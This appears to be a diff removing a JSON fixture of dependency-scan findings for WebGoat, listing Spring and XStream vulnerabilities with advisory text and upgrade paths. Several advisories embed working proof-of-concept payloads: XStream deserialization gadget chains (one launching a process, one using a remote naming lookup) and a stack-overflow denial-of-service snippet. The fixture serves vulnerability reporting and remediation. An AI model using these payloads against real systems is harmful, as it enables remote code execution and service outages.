-          "description": "## Overview\n[org.springframework:spring-webmvc](https://mvnrepository.com/artifact/org.springframework/spring-webmvc) is a package that provides Model-View-Controller (MVC) architecture and ready components that can be used to develop flexible and loosely coupled web applications.\n\nAffected versions of this package are vulnerable to Path Traversal via the `WebMvc.fn` and `WebFlux.fn` frameworks. An attacker can access any file on the file system that is also accessible to the process in which the Spring application is running by crafting malicious HTTP requests.\n\n**Note:**\n\nThis is only exploitable if the web application uses `RouterFunctions` to serve static resources and resource handling is explicitly configured with a `FileSystemResource` location.\n\n## Workaround\n\nThis vulnerability can be mitigated by using the Spring Security HTTP Firewall or running the application on Tomcat or Jetty.\n## Remediation\nUpgrade `org.springframework:spring-webmvc` to version 6.1.13 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/d86bf8b2056429edf5494456cffcb2b243331c49)\n- [Spring Security Advisory](https://spring.io/security/cve-2024-38816)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-38816.yaml)\n- [PoC in GitHub](https://github.com/WULINPIN/CVE-2024-38816-PoC)\n",
-          "evidence": [
-            {
-              "path": [
-                {
-                  "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
-                },
-                {
-                  "name": "org.springframework.boot:spring-boot-starter-web",
-                  "version": "3.1.5"
-                },
-                {
-                  "name": "org.springframework:spring-webmvc",
-                  "version": "6.0.13"
-                }
-              ],
-              "source": "dependency_path"
-            }
-          ],
-          "finding_type": "sca",
-          "key": "00000007-0000-4000-8000-000000000007",
-          "locations": [
-            {
-              "package": {
-                "name": "org.springframework:spring-webmvc",
-                "version": "6.0.13"
-              },
-              "type": "package"
-            }
-          ],
-          "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "high"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 285
-            }
-          },
-          "title": "Path Traversal"
-        },
-        "id": "00000007-0000-4000-8000-000000000007",
-        "links": {},
-        "relationships": {
-          "fix": {
-            "data": {
-              "attributes": {
-                "action": {
-                  "format": "upgrade_package_advice",
-                  "package_name": "org.springframework:spring-webmvc",
-                  "upgrade_paths": [
-                    {
-                      "dependency_path": [
-                        {
-                          "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
-                        },
-                        {
-                          "name": "org.springframework.boot:spring-boot-starter-web",
-                          "version": "3.2.10"
-                        },
-                        {
-                          "name": "org.springframework:spring-webmvc",
-                          "version": "6.1.13"
-                        }
-                      ],
-                      "is_drop": false
-                    }
-                  ]
-                },
-                "outcome": "fully_resolved"
-              },
-              "id": "00000007-0000-4000-8000-000000000007",
-              "type": "fixes"
-            }
-          }
-        },
-        "type": "findings"
-      },
-      {
-        "attributes": {
-          "cause_of_failure": false,
-          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The processed stream at unmarshalling time contains type information to recreate the formerly written objects. XStream creates therefore new instances based on these type information. An attacker can manipulate the processed input stream and replace or inject objects, that can execute arbitrary shell commands.\r\n\r\nThis issue is a variation of CVE-2013-7285, this time using a different set of classes of the Java runtime environment, none of which is part of the XStream default blacklist. The same issue has already been reported for Strut's XStream plugin in CVE-2017-9805, but the XStream project has never been informed about it.\r\n\r\n### PoC\r\n\r\n```\r\n\u003cmap\u003e\r\n  \u003centry\u003e\r\n    \u003cjdk.nashorn.internal.objects.NativeString\u003e\r\n      \u003cflags\u003e0\u003c/flags\u003e\r\n      \u003cvalue class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'\u003e\r\n        \u003cdataHandler\u003e\r\n          \u003cdataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'\u003e\r\n            \u003ccontentType\u003etext/plain\u003c/contentType\u003e\r\n            \u003cis class='java.io.SequenceInputStream'\u003e\r\n              \u003ce class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'\u003e\r\n                \u003citerator class='javax.imageio.spi.FilterIterator'\u003e\r\n                  \u003citer class='java.util.ArrayList$Itr'\u003e\r\n                    \u003ccursor\u003e0\u003c/cursor\u003e\r\n                    \u003clastRet\u003e-1\u003c/lastRet\u003e\r\n                    \u003cexpectedModCount\u003e1\u003c/expectedModCount\u003e\r\n                    \u003couter-class\u003e\r\n                      \u003cjava.lang.ProcessBuilder\u003e\r\n                        \u003ccommand\u003e\r\n                          \u003cstring\u003ecalc\u003c/string\u003e\r\n                        \u003c/command\u003e\r\n                      \u003c/java.lang.ProcessBuilder\u003e\r\n                    \u003c/outer-class\u003e\r\n                  \u003c/iter\u003e\r\n                  \u003cfilter class='javax.imageio.ImageIO$ContainsFilter'\u003e\r\n                    \u003cmethod\u003e\r\n                      \u003cclass\u003ejava.lang.ProcessBuilder\u003c/class\u003e\r\n                      \u003cname\u003estart\u003c/name\u003e\r\n                      \u003cparameter-types/\u003e\r\n                    \u003c/method\u003e\r\n                    \u003cname\u003estart\u003c/name\u003e\r\n                  \u003c/filter\u003e\r\n                  \u003cnext/\u003e\r\n                \u003c/iterator\u003e\r\n                \u003ctype\u003eKEYS\u003c/type\u003e\r\n              \u003c/e\u003e\r\n              \u003cin class='java.io.ByteArrayInputStream'\u003e\r\n                \u003cbuf\u003e\u003c/buf\u003e\r\n                \u003cpos\u003e0\u003c/pos\u003e\r\n                \u003cmark\u003e0\u003c/mark\u003e\r\n                \u003ccount\u003e0\u003c/count\u003e\r\n              \u003c/in\u003e\r\n            \u003c/is\u003e\r\n            \u003cconsumed\u003efalse\u003c/consumed\u003e\r\n          \u003c/dataSource\u003e\r\n          \u003ctransferFlavors/\u003e\r\n        \u003c/dataHandler\u003e\r\n        \u003cdataLen\u003e0\u003c/dataLen\u003e\r\n      \u003c/value\u003e\r\n    \u003c/jdk.nashorn.internal.objects.NativeString\u003e\r\n    \u003cstring\u003etest\u003c/string\u003e\r\n  \u003c/entry\u003e\r\n\u003c/map\u003e\r\n```\r\n\r\n*Note:* `1.4.14-jdk7`is optimised for OpenJDK 7,  release `1.4.14` are compatible with other JDK projects.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n  \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n  \n\n\u003e Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which i",
-          "evidence": [
-            {
-              "path": [
-                {
-                  "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
-                },
-                {
-                  "name": "com.thoughtworks.xstream:xstream",
-                  "version": "1.4.5"
-                }
-              ],
-              "source": "dependency_path"
-            }
-          ],
-          "finding_type": "sca",
-          "key": "00000008-0000-4000-8000-000000000008",
-          "locations": [
-            {
-              "package": {
-                "name": "com.thoughtworks.xstream:xstream",
-                "version": "1.4.5"
-              },
-              "type": "package"
-            }
-          ],
-          "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "high"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 496
-            }
-          },
-          "title": "Deserialization of Untrusted Data"
-        },
-        "id": "00000008-0000-4000-8000-000000000008",
-        "links": {},
-        "relationships": {
-          "fix": {
-            "data": {
-              "attributes": {
-                "action": {
-                  "format": "upgrade_package_advice",
-                  "package_name": "com.thoughtworks.xstream:xstream",
-                  "upgrade_paths": [
-                    {
-                      "dependency_path": [
-                        {
-                          "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
-                        },
-                        {
-                          "name": "com.thoughtworks.xstream:xstream",
-                          "version": "1.4.14"
-                        }
-                      ],
-                      "is_drop": false
-                    }
-                  ]
-                },
-                "outcome": "fully_resolved"
-              },
-              "id": "00000008-0000-4000-8000-000000000008",
-              "type": "fixes"
-            }
-          }
-        },
-        "type": "findings"
-      },
-      {
-        "attributes": {
-          "cause_of_failure": false,
-          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.\r\n\r\n### PoC\r\n\r\n```\r\n\u003cjava.util.PriorityQueue serialization='custom'\u003e\r\n  \u003cunserializable-parents/\u003e\r\n  \u003cjava.util.PriorityQueue\u003e\r\n    \u003cdefault\u003e\r\n      \u003csize\u003e2\u003c/size\u003e\r\n    \u003c/default\u003e\r\n    \u003cint\u003e3\u003c/int\u003e\r\n    \u003cdynamic-proxy\u003e\r\n      \u003cinterface\u003ejava.lang.Comparable\u003c/interface\u003e\r\n      \u003chandler class='com.sun.xml.internal.ws.client.sei.SEIStub'\u003e\r\n        \u003cowner/\u003e\r\n        \u003cmanagedObjectManagerClosed\u003efalse\u003c/managedObjectManagerClosed\u003e\r\n        \u003cdatabinding class='com.sun.xml.internal.ws.db.DatabindingImpl'\u003e\r\n          \u003cstubHandlers\u003e\r\n            \u003centry\u003e\r\n              \u003cmethod\u003e\r\n                \u003cclass\u003ejava.lang.Comparable\u003c/class\u003e\r\n                \u003cname\u003ecompareTo\u003c/name\u003e\r\n                \u003cparameter-types\u003e\r\n                  \u003cclass\u003ejava.lang.Object\u003c/class\u003e\r\n                \u003c/parameter-types\u003e\r\n              \u003c/method\u003e\r\n              \u003ccom.sun.xml.internal.ws.client.sei.StubHandler\u003e\r\n                \u003cbodyBuilder class='com.sun.xml.internal.ws.client.sei.BodyBuilder$DocLit'\u003e\r\n                  \u003cindices\u003e\r\n                    \u003cint\u003e0\u003c/int\u003e\r\n                  \u003c/indices\u003e\r\n                  \u003cgetters\u003e\r\n                    \u003ccom.sun.xml.internal.ws.client.sei.ValueGetter\u003ePLAIN\u003c/com.sun.xml.internal.ws.client.sei.ValueGetter\u003e\r\n                  \u003c/getters\u003e\r\n                  \u003caccessors\u003e\r\n                    \u003ccom.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2\u003e\r\n                      \u003cval_-isJAXBElement\u003efalse\u003c/val_-isJAXBElement\u003e\r\n                      \u003cval_-getter class='com.sun.xml.internal.ws.spi.db.FieldGetter'\u003e\r\n                        \u003ctype\u003eint\u003c/type\u003e\r\n                        \u003cfield\u003e\r\n                          \u003cname\u003ehash\u003c/name\u003e\r\n                          \u003cclazz\u003ejava.lang.String\u003c/clazz\u003e\r\n                        \u003c/field\u003e\r\n                      \u003c/val_-getter\u003e\r\n                      \u003cval_-isListType\u003efalse\u003c/val_-isListType\u003e\r\n                      \u003cval_-n\u003e\r\n                        \u003cnamespaceURI/\u003e\r\n                        \u003clocalPart\u003ehash\u003c/localPart\u003e\r\n                        \u003cprefix/\u003e\r\n                      \u003c/val_-n\u003e\r\n                      \u003cval_-setter class='com.sun.xml.internal.ws.spi.db.MethodSetter'\u003e\r\n                        \u003ctype\u003ejava.lang.String\u003c/type\u003e\r\n                        \u003cmethod\u003e\r\n                          \u003cclass\u003ejavax.naming.InitialContext\u003c/class\u003e\r\n                          \u003cname\u003edoLookup\u003c/name\u003e\r\n                          \u003cparameter-types\u003e\r\n                            \u003cclass\u003ejava.lang.String\u003c/class\u003e\r\n                          \u003c/parameter-types\u003e\r\n                        \u003c/method\u003e\r\n                      \u003c/val_-setter\u003e\r\n                      \u003couter-class\u003e\r\n                        \u003cpropertySetters\u003e\r\n                          \u003centry\u003e\r\n                            \u003cstring\u003eserialPersistentFields\u003c/string\u003e\r\n                            \u003ccom.sun.xml.internal.ws.spi.db.FieldSetter\u003e\r\n                              \u003ctype\u003e[Ljava.io.ObjectStreamField;\u003c/type\u003e\r\n                              \u003cfield\u003e\r\n                                \u003cname\u003eserialPersistentFields\u003c/name\u003e\r\n                                \u003cclazz\u003ejava.lang.String\u003c/clazz\u003e\r\n                              \u003c/field\u003e\r\n                            \u003c/com.sun.xml.internal.ws.spi.db.FieldSetter\u003e\r\n                          \u003c/entry\u003e\r\n                          \u003centry\u003e\r\n                            \u003cstring\u003eCASE_INSENSITIVE_ORDER\u003c/string\u003e\r\n                            \u003ccom.sun.xml.internal.ws.spi.db.FieldSetter\u003e\r\n                              \u003ctype\u003ejava.util.Comparator\u003c/type\u003e\r\n                              \u003cfield\u003e\r\n                                \u003cname\u003eCASE_INSENSITIVE_ORDER\u003c/name\u003e\r\n                                \u003cclazz\u003ejava.lang.String\u003c/clazz\u003e\r\n                              \u003c/field\u003e\r\n                            \u003c/com.sun.xml.internal.ws.spi.db.FieldSetter\u003e\r\n                          \u003c/entry\u003e\r\n                          \u003centry\u003e\r\n                            \u003cstring\u003eserialVersionUID\u003c/string\u003e\r\n                            \u003ccom.sun.xml.internal.ws.spi.db.FieldSetter\u003e\r\n                              \u003ctype\u003elong\u003c/type\u003e\r\n                              \u003cfield\u003e\r\n                                \u003cname\u003eserialVersionUID\u003c/name\u003e\r\n                                \u003cclazz\u003ejava.lang.String\u003c/clazz\u003e\r\n                              \u003c/field\u003e\r\n                            \u003c/com.sun.xml.internal.ws.spi.db.FieldSetter\u003e\r\n                          \u003c/entry\u003e\r\n                          \u003centry\u003e\r\n                            \u003cstring\u003evalue\u003c/string\u003e\r\n                            \u003ccom.sun.xml.internal.ws.spi.db.FieldSetter\u003e\r\n                              \u003ctype\u003e[",
-          "evidence": [
-            {
-              "path": [
-                {
-                  "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
-                },
-                {
-                  "name": "com.thoughtworks.xstream:xstream",
-                  "version": "1.4.5"
-                }
-              ],
-              "source": "dependency_path"
-            }
-          ],
-          "finding_type": "sca",
-          "key": "00000009-0000-4000-8000-000000000009",
-          "locations": [
-            {
-              "package": {
-                "name": "com.thoughtworks.xstream:xstream",
-                "version": "1.4.5"
-              },
-              "type": "package"
-            }
-          ],
-          "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "high"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 557
-            }
-          },
-          "suppression": {
-            "created_at": "2025-11-12T17:28:44.022Z",
-            "justification": "Another arbitrary reason",
-            "path": [
-              "*"
-            ],
-            "policy": {
-              "id": "0000002a-0000-4000-8000-00000000002a"
-            },
-            "status": "ignored"
-          },
-          "title": "Arbitrary Code Execution"
-        },
-        "id": "00000009-0000-4000-8000-000000000009",
-        "links": {},
-        "relationships": {
-          "fix": {
-            "data": {
-              "attributes": {
-                "action": {
-                  "format": "upgrade_package_advice",
-                  "package_name": "com.thoughtworks.xstream:xstream",
-                  "upgrade_paths": [
-                    {
-                      "dependency_path": [
-                        {
-                          "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
-                        },
-                        {
-                          "name": "com.thoughtworks.xstream:xstream",
-                          "version": "1.4.18"
-                        }
-                      ],
-                      "is_drop": false
-                    }
-                  ]
-                },
-                "outcome": "fully_resolved"
-              },
-              "id": "00000009-0000-4000-8000-000000000009",
-              "type": "fixes"
-            }
-          },
-          "policy": {
-            "data": {
-              "attributes": {
-                "policies": [
-                  {
-                    "applied_policy": {
-                      "action_type": "ignore",
-                      "ignore": {
-                        "created": "2025-11-12T17:28:44.022Z",
-                        "disregard_if_fixable": false,
-                        "ignored_by": {
-                          "email": "peter.schafer@snyk.io",
-                          "id": "00000002-0000-4000-8000-000000000002",
-                          "name": "Peter"
-                        },
-                        "path": [
-                          "*"
-                        ],
-                        "reason": "Another arbitrary reason",
-                        "reason_type": "not-vulnerable",
-                        "source": "api"
-                      }
-                    },
-                    "id": "0000002a-0000-4000-8000-00000000002a",
-                    "type": "legacy_policy_snapshot"
-                  }
-                ]
-              },
-              "id": "0000005b-0000-4000-8000-00000000005b",
-              "type": "policies"
-            },
-            "links": {}
-          }
-        },
-        "type": "findings"
-      },
-      {
-        "attributes": {
-          "cause_of_failure": false,
-          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to a manipulated binary input stream. An attacker can terminate the application with a stack overflow error resulting in a denial of service by manipulating the processed input stream when configured to use the `BinaryStreamDriver`.\n\n## Workaround\n\nThis vulnerability can be mitigated by catching the `StackOverflowError` in the client code calling XStream.\n## PoC\nPrepare the manipulated data and provide it as input for a XStream instance using the BinaryDriver:\n\n```java\nfinal byte[] byteArray = new byte[36000];\nfor (int i = 0; i \u003c byteArray.length / 4; i++) {\n      byteArray[i * 4] = 10;\n      byteArray[i * 4 + 1] = -127;\n      byteArray[i * 4 + 2] = 0;\n      byteArray[i * 4 + 3] = 0;\n}\n\nXStream xstream = new XStream(new BinaryStreamDriver());\nxstream.fromXML(new ByteArrayInputStream(byteArray));\n```\n\nAs soon as the data gets unmarshalled, the endless recursion is entered and the executing thread is aborted with a stack overflow error.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, thus allowing the attacker to control the state or the flow of the execution.\n  \n## Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.21 or higher.\n## References\n- [GitHub Commit](https://github.com/x-stream/xstream/commit/bb838ce2269cac47433e31c77b2b236466e9f266)\n- [GitHub Commit](https://github.com/x-stream/xstream/commit/fdd9f7d3de0d7ccf2f9979bcd09fbf3e6a0c881a)\n- [XStream Advisory](https://x-stream.github.io/CVE-2024-47072.html)\n",
-          "evidence": [
-            {
-              "path": [
-                {
-                  "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
-                },
-                {
-                  "name": "com.thoughtworks.xstream:xstream",
-                  "version": "1.4.5"
-                }
-              ],
-              "source": "dependency_path"
-            }
-          ],
-          "finding_type": "sca",
-          "key": "0000000a-0000-4000-8000-00000000000a",
-          "locations": [
-            {
-              "package": {
-                "name": "com.thoughtworks.xstream:xstream",
-                "version": "1.4.5"
-              },
-              "type": "package"
-            }
-          ],
-          "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "high"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 194
-            }
-          },
-          "title": "Deserialization of Untrusted Data"
-        },
-        "id": "0000000a-0000-4000-8000-00000000000a",
-        "links": {},
-        "relationships": {
-          "fix": {
-            "data": {
-              "attributes": {
-                "action": {
-                  "format": "upgrade_package_advice",
-                  "package_name": "com.thoughtworks.xstream:xstream",
-                  "upgrade_paths": [
-                    {
-                      "dependency_path": [
-                        {
-                          "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
-                        },
-                        {
-                          "name": "com.thoughtworks.xstream:xstream",
-                          "version": "1.4.21"
-                        }
-                      ],
-                      "is_drop": false
-                    }
-                  ]
-                },
-                "outcome": "fully_resolved"
-              },
-              "id": "0000000a-0000-4000-8000-00000000000a",
-              "type": "fixes"
-            }
-          }
-        },
-        "type": "findings"
-      },
-      {
-        "attributes": {
-          "cause_of_failure": false,
-          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Insecure XML deserialization. It could deserialize arbitrary user-supplied XML content, representing objects of any type. A remote attacker able to pass XML to XStream could use this flaw to perform a variety of attacks, including remote code execution in the context of the server running the XStream application.\n## Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.7, 1.4.11 or higher.\n## References\n- [Dinis Cruz Blog](http://blog.diniscruz.com/2013/12/xstream-remote-code-execution-exploit.html)\n- [Exploit DB](https://www.exploit-db.com/exploits/39193)\n- [Fisheye](https://fisheye.codehaus.org/changelog/xstream?cs=2210)\n- [GitHub Commit](https://github.com/x-stream/xstream/commit/6344867dce6767af7d0fe34fb393271a6456672d)\n- [Redhat Bugzilla](https://bugzilla.redhat.com/CVE-2013-7285)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1051277)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2013/CVE-2013-7285.yaml)\n",
-          "evidence": [
-            {
-              "path": [
-                {
-                  "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
-                },
-                {
-                  "name": "com.thoughtworks.xstream:xstream",
-                  "version": "1.4.5"
-                }
-              ],
-              "source": "dependency_path"
-            }
-          ],
-          "finding_type": "sca",
-          "key": "0000000b-0000-4000-8000-00000000000b",
-          "locations": [
-            {
-              "package": {
-                "name": "com.thoughtworks.xstream:xstream",
-                "version": "1.4.5"
-              },
-              "type": "package"
-            }
-          ],
-          "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "medium"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 200
-            }
-          },
-          "title": "Insecure XML deserialization"
-        },
-        "id": "0000000b-0000-4000-8000-00000000000b",
-        "links": {},
-        "relationships": {
-          "fix": {
-            "data": {
-              "attributes": {
-                "action": {
-                  "format": "upgrade_package_advice",
-                  "package_name": "com.thoughtworks.xstream:xstream",
-                  "upgrade_paths": [
-                    {
-                      "dependency_path": [
-                        {
-                          "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
-                        },
-                        {
-                          "name": "com.thoughtworks.xstream:xstream",
-                          "version": "1.4.7"
-                        }
-                      ],
-                      "is_drop": false
-                    }
-                  ]
-                },
-                "outcome": "fully_resolved"
-              },
-              "id": "0000000b-0000-4000-8000-00000000000b",
-              "type": "fixes"
-            }
-          }
-        },
-        "type": "findings"
-      },
-      {
-        "attributes": {
-          "cause_of_failure": false,
-          "description": "## Overview\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\nAffected versions of this package are vulnerable to HTTP Response Splitting via the `Content-Disposition` header where the `filename` parameter value could contain non-printable characters, causing parsing issues for HTTP clients. An attacker can cause the download of files containing malicious commands by injecting content into the response.\n\n**Notes:**\n\n1) This is only exploitable if the header is prepared with `org.springframework.http.ContentDisposition`, the filename is set via `ContentDisposition.Builder#filename(String, Charset)`, the value is derived from unsanitized user input, and the attacker can inject malicious content into the downloaded response.\n\n2) The vulnerability was also fixed in the 6.0.29 commercial version.\n## Remediation\nUpgrade `org.springframework:spring-web` to version 6.1.21, 6.2.8 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/f0e7b42704e6b33958f242d91bd690d6ef7ada9c)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/35034)\n- [Spring Security Advisory](https://spring.io/security/cve-2025-41234)\n",
-          "evidence": [
-            {
-              "path": [
-                {
-                  "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
-                },
-                {
-                  "name": "org.springframework.boot:spring-boot-starter-web",
-                  "version": "3.1.5"
-                },
-                {
-                  "name": "org.springframework:spring-web",
-                  "version": "6.0.13"
-                }
-              ],
-              "source": "dependency_path"
-            }
-          ],
-          "finding_type": "sca",
-          "key": "0000000d-0000-4000-8000-00000000000d",
-          "locations": [
-            {
-              "package": {
-                "name": "org.springframework:spring-web",
-                "version": "6.0.13"
-              },
-              "type": "package"
-            }
-          ],
-          "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "medium"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 79
-            }
-          },
-          "title": "HTTP Response Splitting"
-        },
-        "id": "0000000d-0000-4000-8000-00000000000d",
-        "links": {},
-        "relationships": {
-          "fix": {
-            "data": {
-              "attributes": {
-                "action": {
-                  "format": "upgrade_package_advice",
-                  "package_name": "org.springframework:spring-web",
-                  "upgrade_paths": [
-                    {
-                      "dependency_path": [
-                        {
-                          "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
-                        },
-                        {
-                          "name": "org.springframework.boot:spring-boot-starter-web",
-                          "version": "3.3.13"
-                        },
-                        {
-                          "name": "org.springframework:spring-web",
-                          "version": "6.1.21"
-                        }
-                      ],
-                      "is_drop": false
-                    }
-                  ]
-                },
-                "outcome": "fully_resolved"
-              },
-              "id": "0000000d-0000-4000-8000-00000000000d",
-              "type": "fixes"
-            }
-          }
-        },
-        "type": "findings"
-      },
-      {
-        "attributes": {
-          "cause_of_failure": false,
-          "description": "## Overview\n[org.springframework:spring-beans](https://www.baeldung.com/spring-bean) is a package that is the basis for Spring Framework's IoC container. The BeanFactory interface provides an advanced configuration mechanism capable of managing any type of object.\n\nAffected versions of this package are vulnerable to Relative Path Traversal when deployed on non-compliant Servlet containers. An unauthenticated attacker could gain access to files and directories outside the intended web root.\r\n\r\n**Notes:**\r\n\r\n1) This is only exploitable if the application is deployed as a WAR or with an embedded Servlet container, the Servlet container does not reject suspicious sequences and the application serves static resources with Spring resource handling.\r\n\r\n2) Applications deployed on Apache Tomcat or Eclipse Jetty are not vulnerable, as long as default security features are not disabled in the configuration.\r\n\r\n3) This vulnerability was also fixed in the commercial versions 6.1.22 and 5.3.44.\n## Remediation\nUpgrade `org.springframework:spring-beans` to version 6.2.10 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/3781ba223ed76823b99e9c699e0957b391e22bf9)\n- [GitHub Release](https://github.com/spring-projects/spring-framework/releases/tag/v6.2.10)\n- [Spring Release](https://spring.io/blog/2025/08/14/spring-framework-6-2-10-release-fixes-cve-2025-41242)\n- [Vendor Advisory](https://spring.io/security/cve-2025-41242)\n",
-          "evidence": [
-            {
-              "path": [
-                {
-                  "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
-                },
-                {
-                  "name": "org.springframework.boot:spring-boot-starter-web",
-                  "version": "3.1.5"
-                },
-                {
-                  "name": "org.springframework:spring-web",
-                  "version": "6.0.13"
-                },
-                {
-                  "name": "org.springframework:spring-beans",
-                  "version": "6.0.13"
-                }
-              ],
-              "source": "dependency_path"
-            }
-          ],
-          "finding_type": "sca",
-          "key": "0000000e-0000-4000-8000-00000000000e",
-          "locations": [
-            {
-              "package": {
-                "name": "org.springframework:spring-beans",
-                "version": "6.0.13"
-              },
-              "type": "package"
-            }
-          ],
-          "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "high"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 97
-            }
-          },
-          "title": "Relative Path Traversal"
-        },
-        "id": "0000000e-0000-4000-8000-00000000000e",
-        "links": {},
-        "relationships": {
-          "fix": {
-            "data": {
-              "attributes": {
-                "action": {
-                  "format": "upgrade_package_advice",
-                  "package_name": "org.springframework:spring-beans",
-                  "upgrade_paths": [
-                    {
-                      "dependency_path": [
-                        {
-                          "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
-                        },
-                        {
-                          "name": "org.springframework.boot:spring-boot-starter-web",
-                          "version": "3.4.9"
-                        },
-                        {
-                          "name": "org.springframework:spring-web",
-                          "version": "6.2.10"
-                        },
-                        {
-                          "name": "org.springframework:spring-beans",
-                          "version": "6.2.10"
-                        }
-                      ],
-                      "is_drop": false
-                    }
-                  ]
-                },
-                "outcome": "fully_resolved"
-              },
-              "id": "0000000e-0000-4000-8000-00000000000e",
-              "type": "fixes"
-            }
-          }
-        },
-        "type": "findings"
-      },
-      {
-        "attributes": {
-          "cause_of_failure": false,
